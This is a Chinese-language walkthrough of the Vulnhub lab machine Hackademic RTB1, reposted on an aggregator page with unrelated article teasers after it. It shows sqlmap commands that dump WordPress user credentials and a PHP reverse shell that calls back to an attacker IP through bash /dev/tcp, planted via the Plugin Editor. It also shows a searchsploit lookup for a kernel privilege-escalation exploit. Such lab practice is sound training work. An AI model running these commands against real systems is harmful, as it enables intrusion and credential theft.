Vulnhub系列靶机--- Hackadmeic.RTB1

系列:Hackademic(此系列共2台)
难度:初级

信息收集

主机发现

netdiscover -r 192.168.80.0/24

image-20230819150242058

端口扫描

nmap -A -p- 192.168.80.143

image-20230819151707785

访问80端口

image-20230819151453856

使用指纹识别插件查看是WordPress

image-20230819151946799

根据首页显示的内容,点击target

image-20230819152040904

image-20230819152140328

点击 页面能点击的链接,发现点击Uncategorized的时候,链接变成了

http://192.168.80.143/Hackademic_RTB1/?cat=1

image-20230819152319809

尝试有无SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞

image-20230819152424365

目录扫描

单纯的爆破IP地址,扫描不出有用的目录信息

dirsearch -u http://192.168.80.143 -i 200

image-20230819164419748

开始是直接扫了IP,现在多了一个目录/Hackademic_RTB1/,那么直接扫该目录

dirsearch -u http://192.168.80.143/Hackademic_RTB1/ -i 200

image-20230819164354082

漏洞利用

sqlmap

查看都有哪些数据库

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" --dbs --batch

image-20230819152623542

获取所有表

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch

image-20230819152737643

获取该表的所有字段

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  --columns --batch

image-20230819152939501

获取想要的数据

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  -C user_login,user_pass --dump

image-20230819153048717

登录后台192.168.80.143/Hackademic_RTB1/wp-admin/

image-20230819164537854

使用一个用户密码登录 NickJames密码:admin

image-20230819165028767

登上 之后没有什么能够 利用的,尝试换一个用户登录看看

用户:GeorgeMiller密码q1w2e3,发现在Plugins选项里有一个Plugin Editor编辑的地址,加入反弹shell

system("bash -c 'sh -i &>/dev/tcp/192.168.80.132/8989 0>&1'");

image-20230819184510299

kali开启监听

nc -lvvp 8989

提交之后就得要知道上文的 路径,找出路径才能触发反弹shell

找到提交路径方式一:

wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有你上传的图片,视频和附件。

WordPress文件夹内,你会发现大量的代码文件和3个文件夹**wp-admin wp-content wp-includes**

wp-admin 没错,这是你的仪表板你登陆wordpress后看到的界面,包括所有的后台文件

wp-content包含你所有的内容,包括插件 , 主题和您上传的内容

Plugins文件夹包含所有插件。 每个插件都有一个自己的文件夹。 如Aksimet坐在Akismet在文件夹内

同样,theme主题文件夹保存你所有的主题。 插件一样,每个主题有单独的文件夹。

Uploads文件夹,所有你上传图片,视频和附件。

languages是关于语言的

wp-includes包括持有的所有文件和库,是必要的WordPress管理,编辑和JavaScript库,CSS和图像fiels

在爆破目录的时候发现有一个wp-content目录,可以访问一下看看

image-20230819171036292

页面显示如下

http://192.168.80.143/Hackademic_RTB1/wp-content/

image-20230819171102568

刚在又是在Plugins选项里的Plugin Editor编辑的反弹shell,刚在Plugin Editor编辑页面也显示了说正在编辑hello.php

image-20230819184413751

所以在http://192.168.80.143/Hackademic_RTB1/wp-content/页面中点击plugins

image-20230819171841864

image-20230819171903184

就看到了hello.php,点击hello.php触发反弹shell (耐心等待-----------------)

image-20230819172020273

内核提权

查看内核版本

uname -a

image-20230819180019128

新开一个终端搜索该版本的漏洞

searchsploit 2.6.3 | grep "Local Privilege Escalation"

image-20230819180245056

查看完整路径

searchsploit -p linux/local/15285.c

image-20230819180544957

把这个15285.c复制到apache服务的根路径/var/www/html

sudo cp  /usr/share/exploitdb/exploits/linux/local/15285.c  /var/www/html/15285.c

启动apache服务

systemctl restart apache2.service

image-20230819184303398

gcc 15285.c -o exp# 将15285.c预处理、汇编、编译并链接形成可执行文件exp#-o选项用来指定输出文件的文件名

15285.c预处理、汇编、编译并链接形成可执行文件exp

-o选项用来指定输出文件的文件名

image-20230819185040509

在这里插入图片描述

闯关成功!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/44850.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

解决uniapp 二次登陆 登录页是首页时,登录页闪现问题

解决uniapp 二次登陆 登录页是首页时,登录页闪现问题

pages.json文件中,pages数组中第一项是登录页,用户第一次登录后,存储登录状态,以后再进入应用时,自动登录跳转至首页。 但是自动登录跳转至首页时,登录页总是会闪现一下。 第一步:manifest.js…
阅读更多...
Python包sklearn画ROC曲线和PR曲线

Python包sklearn画ROC曲线和PR曲线

前言 关于ROC和PR曲线的介绍请参考: 机器学习:准确率(Precision)、召回率(Recall)、F值(F-Measure)、ROC曲线、PR曲线 参考: Python下使用sklearn绘制ROC曲线(超详细) Python绘图|Python绘制ROC曲线和PR曲线 源码 …
阅读更多...
webshell绕过

webshell绕过

文章目录 webshell前置知识进阶绕过 webshell 前置知识 <?phpecho "A"^""; ?>运行结果 可以看到出来的结果是字符“&#xff01;”。 为什么会得到这个结果&#xff1f;是因为代码的“A”字符与“”字符产生了异或。 php中&#xff0c;两个变…
阅读更多...
线程池原理

线程池原理

一、线程池的定义 线程池&#xff0c;按照配置参数&#xff08;核心线程数、最大线程数等&#xff09;创建并管理若干线程对象&#xff0c;没有任务的时候&#xff0c;这些线程都处于等待空闲状态。如果有新的线程任务&#xff0c;就分配一个空闲线程执行。如果所有线程都处于…
阅读更多...
opencv进阶03-图像与鼠标的交互示例

opencv进阶03-图像与鼠标的交互示例

在处理图像时&#xff0c;可能需要与当前正在处理的图像进行交互。OpenCV 提供了鼠标事件&#xff0c;使用户可以通过鼠标与图像交互。鼠标事件能够识别常用的鼠标操作&#xff0c;例如&#xff1a;针对不同按键的单击、双击&#xff0c;鼠标的滑动、拖曳等。 例如&#xff0c;…
阅读更多...
【广州华锐视点】VR线上教学资源平台提供定制化虚拟现实学习内容

【广州华锐视点】VR线上教学资源平台提供定制化虚拟现实学习内容

虚拟现实&#xff08;VR&#xff09;技术的出现为我们提供了一种全新的在线教学方式。由广州华锐视点开发的VR线上教学资源平台&#xff0c;作为一个综合性的学习工具&#xff0c;正在教育领域迅速发展&#xff0c;并被越来越多的教育机构和学生所接受。那么&#xff0c;VR线上…
阅读更多...
kotlin获取输入

kotlin获取输入

在 Kotlin 中&#xff0c;获取用户输入可以通过标准库中的 readLine() 函数来实现。这个函数允许你从控制台读取用户输入的文本&#xff0c;并将其作为字符串返回。下面是获取用户输入的详细步骤&#xff1a; 1. 使用 readLine() 函数获取用户输入 fun main() {println("…
阅读更多...
把握潮流:服装定制小程序的发展与趋势

把握潮流:服装定制小程序的发展与趋势

随着互联网的快速发展&#xff0c;小程序成为了人们生活中不可或缺的一部分。尤其在服装行业&#xff0c;定制化已经成为了一种趋势。为了满足消费者个性化的需求&#xff0c;服装定制小程序应运而生。 为了方便开发者的设计和制作&#xff0c;我们可以使用第三方的制作平台来创…
阅读更多...
clickhouse新建服务器流程

clickhouse新建服务器流程

1、sudo apt-get install -y apt-transport-https ca-certificates dirmngr 2、sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 8919F6BD2B48D754 3、echo "deb https://packages.clickhouse.com/deb stable main" | sudo tee /etc/apt/sour…
阅读更多...
常见的跨域解决方案

常见的跨域解决方案

常见的跨域解决方案&#xff1a; 跨域问题可以分为两种情况&#xff1a;前端跨域和后端跨域。以下是针对这两种情况的跨域解决方案&#xff1a; 前端跨域解决方案&#xff1a; JSONP&#xff1a; 适用于前端向不同域名下的服务器请求数据&#xff0c;通过添加回调函数名称来…
阅读更多...
vscode + python

vscode + python

序 参考链接&#xff1a; 【教程】VScode中配置Python运行环境_哔哩哔哩_bilibili Python部分 Python Releases for Windows | Python.org vscode部分 Visual Studio Code - Code Editing. Redefined 一路next&#xff0c;全部勾上&#xff1a; 就可以了&#xff1a; 安装插…
阅读更多...
优化GitHub网站访问慢的问题

优化GitHub网站访问慢的问题

方法一、修改host文件解决 大型网站服务器都不会是只有一台服务器,而是多台服务器组成的集群一起对外提供服务。 使用站长工具测速&#xff0c;找一个速度比较快的服务器。 图中可以看到140.82.121.4这个ip比较快&#xff0c; 下面修改hosts: Mac 在 /etc/hosts 中&#x…
阅读更多...
stm32_ADC电源、通道、工作模式

stm32_ADC电源、通道、工作模式

0、ADC功能框图 1、ADC的电源 1.1、工作电源 VSSAVSS&#xff0c;VDDAVDD&#xff0c;简单来说&#xff0c;通常stm32是3.3V&#xff0c;ADC的工作电源也是3.3V&#xff1b; 1.2、参考电压 VREF和VREF-并不一定引出&#xff0c;取决于封装&#xff0c;如果没有引出则VREF连接到…
阅读更多...
classloader的讲解

classloader的讲解

我们先从Activity的启动流程开始切入&#xff1a; //位于android/app/ActivityThread.java中 private Activity performLaunchActivity(ActivityClientRecord r, Intent customIntent) {// ........省略代码//通过反射创建activityjava.lang.ClassLoader cl appContext.getCl…
阅读更多...
前端学习清单

前端学习清单

顺序不分先后。 技术名称技术描述技术链接HTML5HTML5是下一代的HTML标准&#xff0c;是一种用于结构化内容的标记语言。MDN|HTMLCSS3CSS3是CSS技术的升级版本&#xff0c;它的最大好处就是可以让网页设计师更加方便的为网页添加各种各样的样式&#xff0c;而不用再局限于文字、…
阅读更多...
重新认识小米

重新认识小米

被镁光灯聚焦的企业&#xff0c;总是会被贴上各种标签。 8月14日&#xff0c;小米科技创始人雷军以“成长”为主题的年度演讲&#xff0c;刷遍社交网络。提到小米&#xff0c;你首先想到什么&#xff1f;手机发烧友、极致性价比&#xff0c;还是最年轻的500强&#xff1f; 这…
阅读更多...
mapper.xml中循环执行多条语句时报错,但是单独拿SQL到数据库却可以执行

mapper.xml中循环执行多条语句时报错,但是单独拿SQL到数据库却可以执行

我是批量修改数据&#xff0c;用foreach标签包住update语句&#xff0c;报错信息如下&#xff1a; nested exception is java.sql.SQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the …
阅读更多...
区块链应用 DApp 开发需要掌握的技能

区块链应用 DApp 开发需要掌握的技能

文章目录 前言为什么要开发 DAppDApp 的优势DApp 应用范围DApp 开发者技能 前言 前面区块链系列的文章中介绍了区块链技术、智能合约、web3js&#xff0c;Solidity 编程语言&#xff0c;在开发者的角度就是要基于这些知识在Web3时代去开发一个 DApp&#xff08;去中心化应用程…
阅读更多...
【centos】yum只下载不安装rpm包

【centos】yum只下载不安装rpm包

只下载RPM包 目标机器上没有网&#xff0c;就需要先下载好再拷贝安装 reinstall&#xff1a;即使本地已经安装也要下载 &#xff08;☆推荐☆&#xff09;install&#xff1a;下载本机没有安装的包–downloadonly&#xff1a;只下载–downloaddir&#xff1a;下载到哪里&…
阅读更多...
七夕前的爱心代码!

七夕前的爱心代码!

话不多说上代码&#xff01; import turtle as tu import random as ratu.setup(1.0, 1.0) tu.screensize(1.0, 1.0) tu.bgcolor(black) t tu.Pen() t.ht() colors [pink, hotpink, deeppink, lightpink, red, purple, violet, magenta]def draw_star(x, y, size, color):t.…
阅读更多...
最新文章

Copyright @ 2022~2023